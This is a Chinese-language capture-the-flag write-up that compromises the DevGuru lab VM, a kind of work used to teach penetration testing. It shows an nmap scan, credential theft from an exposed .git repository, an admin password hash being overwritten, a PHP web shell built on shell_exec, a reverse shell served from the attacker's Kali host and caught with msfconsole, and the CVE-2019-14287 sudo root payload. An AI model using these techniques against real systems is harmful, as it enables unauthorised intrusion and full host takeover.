資訊收集
kali ip
目標ip
首先我們掃描一下開放埠
nmap -A -p- 192.168.20.143 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-18 10:41 CST Nmap scan report for bogon (192.168.20.143) Host is up (0.00044s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA) | 256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA) |_ 256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-generator: DevGuru | http-git: | 192.168.20.143:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... | Last commit message: first commit | Remotes: | http://devguru.local:8585/frank/devguru-website.git |_ Project type: PHP application (guessed from .gitignore) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Corp - DevGuru 8585/tcp open unknown | fingerprint-strings: | GenericLines: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Content-Type: text/html; charset=UTF-8 | Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647 | Set-Cookie: i_like_gitea=3fa58b0407bb4cfd; Path=/; HttpOnly | Set-Cookie: _csrf=1i6eRR0jsBy2m3oVLV7XjbmTO3Y6MTYzOTc5NTMyOTAyODgyNzUyOQ; Path=/; Expires=Sun, 19 Dec 2021 02:42:09 GMT; HttpOnly | X-Frame-Options: SAMEORIGIN | Date: Sat, 18 Dec 2021 02:42:09 GMT | <!DOCTYPE html> | <html lang="en-US" class="theme-"> | <head data-suburl=""> | <meta charset="utf-8"> | <meta name="viewport" content="width=device-width, initial-scale=1"> | <meta http-equiv="x-ua-compatible" content="ie=edge"> | <title> Gitea: Git with a cup of tea </title> | <link rel="manifest" href="/manifest.json" crossorigin="use-credentials"> | <meta name="theme-color" content="#6cc644"> | <meta name="author" content="Gitea - Git with a cup of tea" /> | <meta name="description" content="Gitea (Git with a cup of tea) is a painless | HTTPOptions: | HTTP/1.0 404 Not Found | Content-Type: text/html; charset=UTF-8 | Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647 | Set-Cookie: i_like_gitea=e9eacdab4eb43047; Path=/; HttpOnly | Set-Cookie: _csrf=YyIv1BjKfPG8puskKPj8fZUT62c6MTYzOTc5NTMyOTA0MjA2MDQ2Nw; Path=/; Expires=Sun, 19 Dec 2021 02:42:09 GMT; HttpOnly | X-Frame-Options: SAMEORIGIN | Date: Sat, 18 Dec 2021 02:42:09 GMT | <!DOCTYPE html> | <html lang="en-US" class="theme-"> | <head data-suburl=""> | <meta charset="utf-8"> | <meta name="viewport" content="width=device-width, initial-scale=1"> | <meta http-equiv="x-ua-compatible" content="ie=edge"> | <title>Page Not Found - Gitea: Git with a cup of tea </title> | <link rel="manifest" href="/manifest.json" crossorigin="use-credentials"> | <meta name="theme-color" content="#6cc644"> | <meta name="author" content="Gitea - Git with a cup of tea" /> |_ <meta name="description" content="Gitea (Git with a c 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8585-TCP:V=7.91%I=7%D=12/18%Time=61BD4A81%P=x86_64-pc-linux-gnu%r(G SF:enericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20 SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\ SF:x20Request")%r(GetRequest,2A00,"HTTP/1\.0\x20200\x20OK\r\nContent-Type: SF:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/ SF:;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=3fa58b0407bb4cfd SF:;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=1i6eRR0jsBy2m3oVLV7Xjb SF:mTO3Y6MTYzOTc5NTMyOTAyODgyNzUyOQ;\x20Path=/;\x20Expires=Sun,\x2019\x20D SF:ec\x202021\x2002:42:09\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x20SAMEO SF:RIGIN\r\nDate:\x20Sat,\x2018\x20Dec\x202021\x2002:42:09\x20GMT\r\n\r\n< SF:!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme-\">\n<head\ SF:x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\n\t<meta\x20name=\" SF:viewport\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\t<m SF:eta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\t<title SF:>\x20Gitea:\x20Git\x20with\x20a\x20cup\x20of\x20tea\x20</title>\n\t<lin SF:k\x20rel=\"manifest\"\x20href=\"/manifest\.json\"\x20crossorigin=\"use- SF:credentials\">\n\t<meta\x20name=\"theme-color\"\x20content=\"#6cc644\"> SF:\n\t<meta\x20name=\"author\"\x20content=\"Gitea\x20-\x20Git\x20with\x20 SF:a\x20cup\x20of\x20tea\"\x20/>\n\t<meta\x20name=\"description\"\x20conte SF:nt=\"Gitea\x20\(Git\x20with\x20a\x20cup\x20of\x20tea\)\x20is\x20a\x20pa SF:inless")%r(HTTPOptions,212A,"HTTP/1\.0\x20404\x20Not\x20Found\r\nConten SF:t-Type:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x2 SF:0Path=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=e9eacdab4 SF:eb43047;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=YyIv1BjKfPG8pus SF:kKPj8fZUT62c6MTYzOTc5NTMyOTA0MjA2MDQ2Nw;\x20Path=/;\x20Expires=Sun,\x20 SF:19\x20Dec\x202021\x2002:42:09\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x SF:20SAMEORIGIN\r\nDate:\x20Sat,\x2018\x20Dec\x202021\x2002:42:09\x20GMT\r SF:\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme-\">\ SF:n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\n\t<meta\x20 SF:name=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\" SF:>\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\ SF:t<title>Page\x20Not\x20Found\x20-\x20\x20Gitea:\x20Git\x20with\x20a\x20 SF:cup\x20of\x20tea\x20</title>\n\t<link\x20rel=\"manifest\"\x20href=\"/ma SF:nifest\.json\"\x20crossorigin=\"use-credentials\">\n\t<meta\x20name=\"t SF:heme-color\"\x20content=\"#6cc644\">\n\t<meta\x20name=\"author\"\x20con SF:tent=\"Gitea\x20-\x20Git\x20with\x20a\x20cup\x20of\x20tea\"\x20/>\n\t<m SF:eta\x20name=\"description\"\x20content=\"Gitea\x20\(Git\x20with\x20a\x2 SF:0c"); MAC Address: 00:0C:29:49:16:E8 (VMware) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.6 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.44 ms bogon (192.168.20.143) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 94.30 seconds
開放了22,80,8585埠,核心版本認為是Linux4.x或5.x的版本,在80埠處提示了一個域名,那我們將域名和ip地址手動進行繫結一下
我們再看nmap掃描得出的結果這裡發現一個.git的目錄,這時候我們就想到可以將這個目錄匯出來,推薦使用gitdump,但我這裡使用githacker使用習慣了我就使用githacker了
我們來看一下看看git倉庫有什麼樣的資訊
我們先來看一下README.md
簡單看了一下就是輔助安裝文件以及安裝的最低要求
到config裡面看看有沒有什麼資訊
我們先看一下app.php裡面的東西
大致就儲存的一些資訊沒啥用
然後我們來看一下database.php的相關資訊
這裡我們意外發現mysql的登入使用者名稱和密碼
然後在倉庫資料夾中發現adminer.php我們去搜一下這東西
經過搜尋發現原來是資料庫管理工具
然後我們去80埠看看,成功進入登入頁面
然後我們使用mysql使用者名稱密碼登入
成功登入
掃描到這個感覺像後臺登入地址
測試了一下果真
然後我們去看一下資料庫裡面的資料看看有沒有關於使用者名稱密碼的
發現一個使用者名稱密碼
然後我們去看一下後臺組的情況
只有一個,網站擁有組的許可權,所有使用者只有一個組網站擁有組
我們搜搜看有沒有線上加密工具搜到了連結如下
https://www.jisuan.mobi/p163u3BN66Hm6JWx.html
然後我們Rounds使用預設的即可,密碼就設定為123456
然後我們到資料庫中修改值
然後我們去登陸,成功登入後臺
漏洞利用
在CMS這個欄發現有編輯程式碼的功能,我們自己來構造一個惡意程式碼
程式碼內容
function onStart() { $this->page['myVar']=shell_exec($_REQUEST['cmd']); }
在Makeup這欄把東西加上去
然後我們儲存並嘗試到前端去執行指令
成功執行,建立反向連線shell,並將它儲存到shell.php中
然後我們在kali搭建一個簡單的網站服務,並且將shell上傳到伺服器中
使用msfconsole進行監聽
瀏覽器訪問shell
成功連線
檢視當前許可權
使用python建立互動式提示符
python3 -c "import pty;pty.spawn('/bin/bash')"#靶機沒有python2要用python3執行
然後到處找找在/var發現備份檔案然後我們將他下載下來看看
我們來看看app.ini.bak
又發現一組資料庫資訊我們去登入又發現一組使用者名稱密碼但密碼是加密的我們重點看這個提示
由於我沒找到如何解開這段密文,那我們就修改加密方式並把密文改掉
這個站點在8585埠還有個東西我們訪問一下,然後嘗試登入,最後發現成功登入
到處看看發現這裡我們是可以輸入的
msf設定監聽
生成惡意程式碼
上傳惡意程式碼
下面就是想辦法觸發
我們在倉庫那裡發現是可以編輯的我們多加點空行即可觸發
檢視一下許可權
發現已經是普通使用者許可權
提權
sudo -l 檢查sudo命令執行的情況
發現命令結果
有這樣的配置,同時sudo命令版本低於1.8.27所以判斷存在CVE-2019-14287漏洞,使用payload進行提權
sudo -u#-1 sqlite3 /dev/null '.shell /bin/bash'
獲得root許可權
sed -i "s/PasswordAuthenication no/PasswordAuthentication yes/" /etc/ssh/sshd_config
SSH連線成功